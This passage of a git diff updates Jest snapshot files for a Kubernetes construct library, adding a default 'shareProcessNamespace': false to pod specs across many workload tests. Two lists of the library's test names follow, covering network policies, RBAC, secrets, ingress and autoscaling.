"setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1196,6 +1205,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1323,6 +1333,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1450,6 +1461,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1578,6 +1590,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1710,6 +1723,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1844,6 +1858,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2012,6 +2027,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2146,6 +2162,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2266,6 +2283,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2394,6 +2412,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2509,6 +2528,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2633,6 +2653,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, 
"terminationGracePeriodSeconds": 30, }, }, @@ -2754,6 +2775,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2869,6 +2891,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2990,6 +3013,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "volumes": Array [ Object { diff --git a/test/__snapshots__/job.test.ts.snap b/test/__snapshots__/job.test.ts.snap index 5aca1007..106074f8 100644 --- a/test/__snapshots__/job.test.ts.snap +++ b/test/__snapshots__/job.test.ts.snap @@ -48,6 +48,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/network-policy.test.ts.snap b/test/__snapshots__/network-policy.test.ts.snap index 514e47f9..470cf8bd 100644 --- a/test/__snapshots__/network-policy.test.ts.snap +++ b/test/__snapshots__/network-policy.test.ts.snap @@ -136,6 +136,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -181,6 +182,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -267,6 +269,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -331,6 +334,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -419,6 +423,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -502,6 +507,7 @@ Array [ "runAsNonRoot": true, }, 
"setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -584,6 +590,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -671,6 +678,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -766,6 +774,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -857,6 +866,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -962,6 +972,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1048,6 +1059,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1135,6 +1147,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1180,6 +1193,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1266,6 +1280,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1330,6 +1345,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1418,6 +1434,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1501,6 +1518,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, 
"terminationGracePeriodSeconds": 30, }, }, @@ -1583,6 +1601,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1670,6 +1689,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1765,6 +1785,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1856,6 +1877,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1961,6 +1983,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2047,6 +2070,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2134,6 +2158,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2217,6 +2242,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/pod.test.ts.snap b/test/__snapshots__/pod.test.ts.snap index 137d7e68..3b173625 100644 --- a/test/__snapshots__/pod.test.ts.snap +++ b/test/__snapshots__/pod.test.ts.snap @@ -44,6 +44,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -99,6 +100,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -173,6 +175,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ 
-291,6 +294,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -341,6 +345,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -417,6 +422,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -467,6 +473,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -543,6 +550,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -593,6 +601,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -721,6 +730,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -771,6 +781,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -847,6 +858,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -897,6 +909,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -973,6 +986,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1023,6 +1037,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1127,6 +1142,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + 
"shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1206,6 +1222,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1324,6 +1341,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1431,6 +1449,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1481,6 +1500,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1607,6 +1627,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1659,6 +1680,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1828,6 +1850,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1873,6 +1896,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1923,6 +1947,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2034,6 +2059,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2154,6 +2180,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2204,6 +2231,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ 
-2366,6 +2394,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2478,6 +2507,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2582,6 +2612,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2661,6 +2692,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2779,6 +2811,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2896,6 +2929,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2946,6 +2980,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3072,6 +3107,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3124,6 +3160,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3293,6 +3330,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3338,6 +3376,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3388,6 +3427,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3499,6 +3539,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, 
+ "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3619,6 +3660,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3669,6 +3711,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3831,6 +3874,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3943,6 +3987,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4011,6 +4056,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4061,6 +4107,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4155,6 +4202,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4257,6 +4305,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4351,6 +4400,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4440,6 +4490,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4490,6 +4541,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4598,6 +4650,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ 
-4760,6 +4813,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4811,6 +4865,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4881,6 +4936,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4950,6 +5006,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5000,6 +5057,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5062,6 +5120,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5112,6 +5171,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5171,6 +5231,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5238,6 +5299,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5303,6 +5365,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5353,6 +5416,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5415,6 +5479,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5465,6 +5530,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, 
+ "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5524,6 +5590,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5591,6 +5658,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5663,6 +5731,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5713,6 +5782,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "tolerations": Array [ Object { diff --git a/test/__snapshots__/service.test.ts.snap b/test/__snapshots__/service.test.ts.snap index 51c9d49f..d27cc7bd 100644 --- a/test/__snapshots__/service.test.ts.snap +++ b/test/__snapshots__/service.test.ts.snap @@ -95,6 +95,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/statefulset.test.ts.snap b/test/__snapshots__/statefulset.test.ts.snap index 86d6f7b3..92e3117c 100644 --- a/test/__snapshots__/statefulset.test.ts.snap +++ b/test/__snapshots__/statefulset.test.ts.snap @@ -76,6 +76,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -197,6 +198,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, },
[ "Can be isolated", "default configuration", "custom configuration", "Can be exposed as via ingress", "exposing via a service preserves deployment namespace", "expose captures all container ports", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "Instantiation properties are all respected", "can mount 
container to a pv", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when 
target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "can select a deployment", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "can allow to peer across namespaces", "can allow to multiple peers", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "can allow from peer across namespaces", "can allow from multiple peers", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress 
policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "StatefulSet gets defaults" ]
[ "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "Can mutate metadata", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "fromCommand", "fromHttpGet", "fromTcpSocket", "can grant permissions on imported", "defaultChild", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "defaults", "can select namespaces", "can select all namespaces", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", 
"can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is 
set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using 
